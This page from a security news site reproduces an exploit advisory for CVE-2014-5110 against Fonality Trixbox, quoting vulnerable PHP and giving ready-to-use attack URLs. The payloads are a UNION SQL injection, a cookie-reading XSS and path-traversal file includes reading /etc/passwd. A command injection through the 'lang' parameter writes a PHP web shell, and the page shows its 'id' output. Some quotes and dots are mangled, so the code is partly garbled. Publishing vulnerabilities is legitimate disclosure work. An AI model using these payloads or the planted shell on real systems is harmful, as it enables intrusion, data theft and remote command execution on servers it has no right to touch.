Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2014-5110: Trixbox XSS / LFI / SQL Injection

Cross-site scripting (XSS) vulnerability in user/help/html/index.php in Fonality trixbox allows remote attackers to inject arbitrary web script or HTML via the id_nodo parameter.

CVE
#sql#xss#vulnerability#web#mac#php#rce#perl#auth

Trixbox All Version - Multiple Vulnerabilties

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [[email protected]] , [[email protected]]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.trixbox.com/
####################################################################

[1] Sql Injection

VULNERABILITY
##############
[I] /var/www/html/maint/modules/endpointcfg/endpoint_generic.php

Line 79-99:
case 'Submit’:
$message = "";
$phone_vars[‘mac_address’] = cleanMAC($phone_vars[‘mac_address’]);
if(!preg_match('/^[0-9A-F]{12}$/i’, $phone_vars[‘mac_address’]))
{$message = “MAC is invalid";}
if ($phone_vars[‘freepbx_device’]!="NONE”) { //get list of devices
from FreePBX
$phone_vars = PopulateFromFreepbx($phone_vars);
}
else
{
$phone_vars[‘phone_label’] =
$MACTABLE[substr($phone_vars[‘mac_address’],0,6)][‘vendor’];

    }

    if ($_REQUEST['mac']){ // if there is an ID then edit an existing  

phone
$querytxt = "UPDATE Generic SET “;
foreach ($phone_vars as $key => $value) {
$querytxt .= $key. " = '” .trim($value). "’,";
}
$querytxt .= “EditDate = NOW() WHERE mac_address=’” .
$_REQUEST[‘mac’]."’";
$error = getSQL($querytxt,’endpoints’);
}

#########
EXPLOIT
#########

Http://IP/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1’
and 1=2 union select 1,2,3,4,5,6-- -

[2] Cross Site Scripting

VULNERABILITY
##############
[I] /var/www/html/user/help/html/index.php

Line 44:
$smarty->assign("id_nodo", $_GET[‘id_nodo’]);

#########
EXPLOIT
#########

Http://IP/user/help/html/index.php?id_nodo="
onmouseover%3dprompt(document.cookie) bad%3d"

[3] Multiple Local File Include

VULNERABILITY
##############
[I] /var/www/html/maint/modules/home/index.php

Line 68-72:

$tbLang = $_GET[‘lang’];
$languageFile = 'language/’.$tbLang.’.php’;
if(file_exists($languageFile)){
include($languageFile);
}

#########
EXPLOIT
#########

Http://IP/maint/modules/home/index.php?lang=…/…/…/…/…/…/…/…/etc/passwd%00

VULNERABILITY
##############
[II] /var/www/html/maint/modules/asterisk_info/asterisk_info.php

Line 17-25:

if(!empty($_GET[‘lang’]) && isset($_GET[‘lang’])){
$tbLang = $_GET[‘lang’];
}else{
$tbLang = 'english’;
}
$languageFile = 'language/’.$tbLang.’.php’;
if(file_exists($languageFile)){
include($languageFile);
}

#########
EXPLOIT
#########
Http://IP/maint/modules/asterisk_info/asterisk_info.php?lang=…/…/…/…/…/…/…/…/etc/passwd%00

VULNERABILITY
##############
[III] /var/www/html/maint/modules/repo/repo.php

Line 9-13:

$tbLang = $_GET[‘lang’];
$languageFile = 'language/’.$tbLang.’.php’;
if(file_exists($languageFile)){
include($languageFile);
}

#########
EXPLOIT
#########
Http://IP/maint/modules/repo/repo.php?lang=…/…/…/…/…/…/…/…/etc/passwd%00

VULNERABILITY
##############
[V] /var/www/html/maint/modules/endpointcfg/endpointcfg.php

Line 29-33:

if(!empty($_GET[‘lang’]) && isset($_GET[‘lang’])){
$languageFile = includeLanguage($_GET[‘lang’]);
include($languageFile);
$tbLang = $_GET[‘lang’];
}else{

#########
EXPLOIT
#########
Http://IP/maint/modules/endpointcfg/endpointcfg.php?lang=…/…/…/…/…/…/…/…/etc/passwd%00

[4] Remote Code Execution

VULNERABILITY
##############
[I] /var/www/html/maint/modules/home/index.php

Line 339:

$phpOutput = shell_exec('php -q libs/status.php '.$tbLang);//exec('perl  

libs/status.pl’);

Line 68:

$tbLang = $_GET['lang'];

#########
EXPLOIT
#########

Http://IP/maint/modules/home/index.php?lang=MF;echo "<?php
system($_GET[‘cmd’]);?> $Greats 2 MY="Love:D">shell.php

Your Shell

Http://IP/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D
####################################################################

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907